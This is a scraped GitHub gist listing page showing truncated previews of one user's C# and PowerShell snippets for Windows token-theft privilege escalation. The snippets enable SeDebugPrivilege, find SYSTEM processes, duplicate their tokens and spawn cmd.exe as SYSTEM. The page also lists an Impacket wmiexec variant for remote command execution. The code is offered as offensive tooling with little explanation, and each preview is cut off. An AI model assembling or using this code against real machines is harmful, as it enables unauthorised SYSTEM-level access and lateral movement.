Skip to content

Instantly share code, notes, and snippets.

Avatar

Amine shelld0n

View GitHub Profile
View CreateProcessWithTokenW_code.cs
// Duplicate token and spawn a new cmd.exe process
myAPI.SECURITY_IMPERSONATION_LEVEL seImpersonateLevel = myAPI.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation;
myAPI.TOKEN_TYPE tokenType = myAPI.TOKEN_TYPE.TokenPrimary;
IntPtr pNewToken = new IntPtr();
myAPI.SECURITY_ATTRIBUTES sec_att = new myAPI.SECURITY_ATTRIBUTES();
if (!myAPI.DuplicateTokenEx(tokenHandle, myAPI.TOKEN_ALL_ACCESS, ref sec_att, seImpersonateLevel, tokenType, out pNewToken)) { Console.WriteLine("Can't Adjust access Token"); Environment.Exit(2); };
myAPI.STARTUPINFO si = new myAPI.STARTUPINFO();
myAPI.PROCESS_INFORMATION pi;
bool ret;
ret = myAPI.CreateProcessWithTokenW(pNewToken, myAPI.LogonFlags.NetCredentialsOnly, "C:\\Windows\\System32\\cmd.exe", null, myAPI.CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi);
@shelld0n
shelld0n / CreateProcessWithToken_definitions.cs
Created Feb 1, 2020
CreateProcessWithToken_definitions
View CreateProcessWithToken_definitions.cs
public enum LogonFlags
{
WithProfile = 1,
NetCredentialsOnly
}
public enum CreationFlags
{
DefaultErrorMode = 0x04000000,
NewConsole = 0x00000010,
View OpenProcessToken_codeblock.cs
// Duplicate Tokens for system process and store them in tokenHandle
Console.WriteLine("your journey just started");
IntPtr test = myAPI.OpenProcess(myAPI.ProcessAccessFlags.QueryInformation, true, pid);
if (test == IntPtr.Zero) Console.WriteLine("No Handle to process !");
IntPtr tokenHandle;
bool result_token = myAPI.OpenProcessToken(test, myAPI.TOKEN_READ | myAPI.TOKEN_IMPERSONATE | myAPI.TOKEN_DUPLICATE, out tokenHandle);
Console.WriteLine(result_token);
//End of getting the handle of token of SYSTEM process
View openprocess.cs
// see http://www.pinvoke.net/default.aspx/kernel32/OpenProcess.html
[Flags]
public enum ProcessAccessFlags : uint
{
All = 0x001F0FFF,
Terminate = 0x00000001,
CreateThread = 0x00000002,
VirtualMemoryOperation = 0x00000008,
VirtualMemoryRead = 0x00000010,
VirtualMemoryWrite = 0x00000020,
View AdjustTokenPrivileges_codeblock.cs
// Enable SeDebugPrivilege Routine
string Privilege = "SeDebugPrivilege";
myAPI.LUID luid = new myAPI.LUID();
IntPtr hProcess = myAPI.GetCurrentProcess();
IntPtr hToken;
if (!myAPI.OpenProcessToken(hProcess, myAPI.TOKEN_QUERY | myAPI.TOKEN_ADJUST_PRIVILEGES, out hToken)) { Console.WriteLine("No tokens for current process"); Environment.Exit(2); };
if (!myAPI.LookupPrivilegeValue(null, Privilege, out luid)) { Console.WriteLine("No handle for privilege"); Environment.Exit(2); };
myAPI.LUID_AND_ATTRIBUTES luAttr = new myAPI.LUID_AND_ATTRIBUTES { Luid = luid, Attributes = myAPI.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED };
myAPI.TOKEN_PRIVILEGES tp = new myAPI.TOKEN_PRIVILEGES { PrivilegeCount = 1, Privileges = new myAPI.LUID_AND_ATTRIBUTES[1] };
tp.Privileges[0] = luAttr;
View API_imports.cs
// see https://www.pinvoke.net/default.aspx/advapi32.openprocesstoken
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY = 0x0008;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
View AdjustTokenPrivileges.cs
// Luid Structure Definition
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public Int32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES
@shelld0n
shelld0n / get_pid.ps1
Created Jan 31, 2020
get PID of system process
View get_pid.ps1
Get-Process -IncludeUserName | Where-Object {$_.USERNAME -Like '*SYSTEM*'} | select ProcessName, Id, Handles
@shelld0n
shelld0n / SYSTEM.cs
Last active Dec 30, 2019
SYSTEM Draft
View SYSTEM.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
namespace Token
{
class Program
@shelld0n
shelld0n / wmiexec_server_mode.py
Created Sep 20, 2019
Impacket wmiexec.py implementation supporting SERVER mode
View wmiexec_server_mode.py
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
You can’t perform that action at this time.